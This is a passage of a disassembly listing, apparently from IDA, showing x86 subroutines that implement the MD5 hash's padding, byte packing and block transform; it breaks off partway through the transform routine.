; Attributes: bp-based frame
sub_40F26E proc near ; CODE XREF: sub_40ECEB+2E�p
; sub_40ED6E+2E�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_4]
mov eax, [eax+10h]
shr eax, 3
and eax, 3Fh
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_4]
lea eax, [ecx+eax+18h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov byte ptr [eax], 80h
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
push 3Fh
pop eax
sub eax, [ebp+var_8]
mov [ebp+var_8], eax
cmp [ebp+var_8], 8
jnb short loc_40F2E1
push [ebp+var_8]
push 0
push [ebp+var_4]
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+arg_4]
add eax, 18h
push eax
push [ebp+arg_4]
call sub_40F3CE
pop ecx
pop ecx
push 38h
push 0
mov eax, [ebp+arg_4]
add eax, 18h
push eax
call sub_416B6A ; memset
add esp, 0Ch
jmp short loc_40F2F5
; ---------------------------------------------------------------------------
loc_40F2E1: ; CODE XREF: sub_40F26E+3B�j
mov eax, [ebp+var_8]
sub eax, 8
push eax
push 0
push [ebp+var_4]
call sub_416B6A ; memset
add esp, 0Ch
loc_40F2F5: ; CODE XREF: sub_40F26E+71�j
push 8
mov eax, [ebp+arg_4]
add eax, 10h
push eax
mov eax, [ebp+arg_4]
add eax, 50h
push eax
call sub_40F33F
add esp, 0Ch
mov eax, [ebp+arg_4]
add eax, 18h
push eax
push [ebp+arg_4]
call sub_40F3CE
pop ecx
pop ecx
push 10h
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40F33F
add esp, 0Ch
push 4
push 0
push [ebp+arg_4]
call sub_416B6A ; memset
add esp, 0Ch
leave
retn
sub_40F26E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F33F proc near ; CODE XREF: sub_40F26E+97�p
; sub_40F26E+B8�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
and [ebp+var_8], 0
jmp short loc_40F35E
; ---------------------------------------------------------------------------
loc_40F34E: ; CODE XREF: sub_40F33F+8B�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
mov eax, [ebp+var_8]
add eax, 4
mov [ebp+var_8], eax
loc_40F35E: ; CODE XREF: sub_40F33F+D�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_8]
jnb short locret_40F3CC
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
mov eax, [ecx+eax*4]
and eax, 0FFh
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
mov eax, [ecx+eax*4]
shr eax, 8
and eax, 0FFh
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx+1], al
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
mov eax, [ecx+eax*4]
shr eax, 10h
and eax, 0FFh
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx+2], al
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
mov eax, [ecx+eax*4]
shr eax, 18h
and eax, 0FFh
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx+3], al
jmp short loc_40F34E
; ---------------------------------------------------------------------------
locret_40F3CC: ; CODE XREF: sub_40F33F+25�j
leave
retn
sub_40F33F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F3CE proc near ; CODE XREF: sub_40F159+AA�p
; sub_40F159+E3�p ...
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 50h
push 40h
push [ebp+arg_4]
lea eax, [ebp+var_50]
push eax
call sub_410244
add esp, 0Ch
mov eax, [ebp+arg_0]
mov eax, [eax]
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
mov eax, [eax+4]
mov [ebp+var_8], eax
mov eax, [ebp+arg_0]
mov eax, [eax+8]
mov [ebp+var_C], eax
mov eax, [ebp+arg_0]
mov eax, [eax+0Ch]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
and eax, [ebp+var_C]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_50]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-28955B88h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 7
mov ecx, [ebp+var_4]
shr ecx, 19h
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
and eax, [ebp+var_8]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_4C]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-173848AAh]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Ch
mov ecx, [ebp+var_10]
shr ecx, 14h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
and eax, [ebp+var_4]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_48]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax+242070DBh]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 11h
mov ecx, [ebp+var_C]
shr ecx, 0Fh
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
and eax, [ebp+var_10]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_44]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-3E423112h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 16h
mov ecx, [ebp+var_8]
shr ecx, 0Ah
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
and eax, [ebp+var_C]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_40]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-0A83F051h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 7
mov ecx, [ebp+var_4]
shr ecx, 19h
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
and eax, [ebp+var_8]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_3C]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax+4787C62Ah]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Ch
mov ecx, [ebp+var_10]
shr ecx, 14h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
and eax, [ebp+var_4]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_38]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-57CFB9EDh]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 11h
mov ecx, [ebp+var_C]
shr ecx, 0Fh
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
and eax, [ebp+var_10]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_34]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-2B96AFFh]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 16h
mov ecx, [ebp+var_8]
shr ecx, 0Ah
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
and eax, [ebp+var_C]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_30]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax+698098D8h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 7
mov ecx, [ebp+var_4]
shr ecx, 19h
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
and eax, [ebp+var_8]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_2C]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-74BB0851h]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Ch
mov ecx, [ebp+var_10]
shr ecx, 14h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
and eax, [ebp+var_4]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_28]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-0A44Fh]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 11h
mov ecx, [ebp+var_C]
shr ecx, 0Fh
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
and eax, [ebp+var_10]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_24]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-76A32842h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 16h
mov ecx, [ebp+var_8]
shr ecx, 0Ah
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
and eax, [ebp+var_C]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_20]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax+6B901122h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 7
mov ecx, [ebp+var_4]
shr ecx, 19h
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
and eax, [ebp+var_8]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_1C]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-2678E6Dh]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Ch
mov ecx, [ebp+var_10]
shr ecx, 14h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
and eax, [ebp+var_4]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_18]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-5986BC72h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 11h
mov ecx, [ebp+var_C]
shr ecx, 0Fh
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
and eax, [ebp+var_10]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_14]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax+49B40821h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 16h
mov ecx, [ebp+var_8]
shr ecx, 0Ah
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
and eax, [ebp+var_8]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_4C]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-9E1DA9Eh]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 5
mov ecx, [ebp+var_4]
shr ecx, 1Bh
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
and eax, [ebp+var_4]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_38]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-3FBF4CC0h]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 9
mov ecx, [ebp+var_10]
shr ecx, 17h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
and eax, [ebp+var_10]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_24]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax+265E5A51h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 0Eh
mov ecx, [ebp+var_C]
shr ecx, 12h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
and eax, [ebp+var_C]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_50]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-16493856h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 14h
mov ecx, [ebp+var_8]
shr ecx, 0Ch
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
and eax, [ebp+var_8]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_3C]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-29D0EFA3h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 5
mov ecx, [ebp+var_4]
shr ecx, 1Bh
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
and eax, [ebp+var_4]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_28]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax+2441453h]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 9
mov ecx, [ebp+var_10]
shr ecx, 17h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
and eax, [ebp+var_10]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_14]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-275E197Fh]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 0Eh
mov ecx, [ebp+var_C]
shr ecx, 12h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
and eax, [ebp+var_C]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_40]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-182C0438h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 14h
mov ecx, [ebp+var_8]
shr ecx, 0Ch
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
and eax, [ebp+var_8]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_2C]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax+21E1CDE6h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 5
mov ecx, [ebp+var_4]
shr ecx, 1Bh
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
and eax, [ebp+var_4]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_18]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-3CC8F82Ah]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 9
mov ecx, [ebp+var_10]
shr ecx, 17h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
and eax, [ebp+var_10]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_44]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-0B2AF279h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 0Eh
mov ecx, [ebp+var_C]
shr ecx, 12h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
and eax, [ebp+var_C]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_30]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax+455A14EDh]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 14h
mov ecx, [ebp+var_8]
shr ecx, 0Ch
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
and eax, [ebp+var_8]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_1C]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-561C16FBh]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 5
mov ecx, [ebp+var_4]
shr ecx, 1Bh
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
and eax, [ebp+var_4]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_48]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-3105C08h]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 9
mov ecx, [ebp+var_10]
shr ecx, 17h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
and eax, [ebp+var_10]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_34]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax+676F02D9h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 0Eh
mov ecx, [ebp+var_C]
shr ecx, 12h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
and eax, [ebp+var_C]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_20]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-72D5B376h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 14h
mov ecx, [ebp+var_8]
shr ecx, 0Ch
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
xor eax, [ebp+var_C]
xor eax, [ebp+var_10]
add eax, [ebp+var_3C]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-5C6BEh]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 4
mov ecx, [ebp+var_4]
shr ecx, 1Ch
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
xor eax, [ebp+var_8]
xor eax, [ebp+var_C]
add eax, [ebp+var_30]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-788E097Fh]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Bh
mov ecx, [ebp+var_10]
shr ecx, 15h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
xor eax, [ebp+var_4]
xor eax, [ebp+var_8]
add eax, [ebp+var_24]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax+6D9D6122h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 10h
mov ecx, [ebp+var_C]
shr ecx, 10h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
xor eax, [ebp+var_10]
xor eax, [ebp+var_4]
add eax, [ebp+var_18]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-21AC7F4h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 17h
mov ecx, [ebp+var_8]
shr ecx, 9
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
xor eax, [ebp+var_C]
xor eax, [ebp+var_10]
add eax, [ebp+var_4C]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-5B4115BCh]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 4
mov ecx, [ebp+var_4]
shr ecx, 1Ch
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
xor eax, [ebp+var_8]
xor eax, [ebp+var_C]
add eax, [ebp+var_40]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax+4BDECFA9h]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Bh
mov ecx, [ebp+var_10]
shr ecx, 15h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
xor eax, [ebp+var_4]
xor eax, [ebp+var_8]
add eax, [ebp+var_34]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-944B4B0h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 10h
mov ecx, [ebp+var_C]
shr ecx, 10h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
xor eax, [ebp+var_10]
xor eax, [ebp+var_4]
add eax, [ebp+var_28]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-41404390h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 17h
mov ecx, [ebp+var_8]
shr ecx, 9
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
xor eax, [ebp+var_C]
xor eax, [ebp+var_10]
add eax, [ebp+var_1C]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax+289B7EC6h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 4
mov ecx, [ebp+var_4]
shr ecx, 1Ch
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
xor eax, [ebp+var_8]
xor eax, [ebp+var_C]
add eax, [ebp+var_50]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-155ED806h]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Bh
mov ecx, [ebp+var_10]
shr ecx, 15h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
xor eax, [ebp+var_4]
xor eax, [ebp+var_8]
add eax, [ebp+var_44]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-2B10CF7Bh]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 10h
mov ecx, [ebp+var_C]
shr ecx, 10h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
xor eax, [ebp+var_10]
xor eax, [ebp+var_4]
add eax, [ebp+var_38]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax+4881D05h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 17h
mov ecx, [ebp+var_8]
shr ecx, 9
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
xor eax, [ebp+var_C]
xor eax, [ebp+var_10]
add eax, [ebp+var_2C]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-262B2FC7h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 4
mov ecx, [ebp+var_4]
shr ecx, 1Ch
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
xor eax, [ebp+var_8]
xor eax, [ebp+var_C]
add eax, [ebp+var_20]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-1924661Bh]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Bh
mov ecx, [ebp+var_10]
shr ecx, 15h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
xor eax, [ebp+var_4]
xor eax, [ebp+var_8]
add eax, [ebp+var_14]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax+1FA27CF8h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 10h
mov ecx, [ebp+var_C]
shr ecx, 10h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
xor eax, [ebp+var_10]
xor eax, [ebp+var_4]
add eax, [ebp+var_48]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-3B53A99Bh]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 17h
mov ecx, [ebp+var_8]
shr ecx, 9
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
not eax
mov ecx, [ebp+var_8]
or ecx, eax
mov eax, [ebp+var_C]
xor eax, ecx
add eax, [ebp+var_50]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-0BD6DDBCh]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 6
mov ecx, [ebp+var_4]
shr ecx, 1Ah
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
not eax
mov ecx, [ebp+var_4]
or ecx, eax
mov eax, [ebp+var_8]
xor eax, ecx
add eax, [ebp+var_34]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax+432AFF97h]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Ah
mov ecx, [ebp+var_10]
shr ecx, 16h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
not eax
mov ecx, [ebp+var_10]
or ecx, eax
mov eax, [ebp+var_4]
xor eax, ecx
add eax, [ebp+var_18]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-546BDC59h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 0Fh
mov ecx, [ebp+var_C]
shr ecx, 11h
or eax, ecx
mov [ebp+var_C], eax
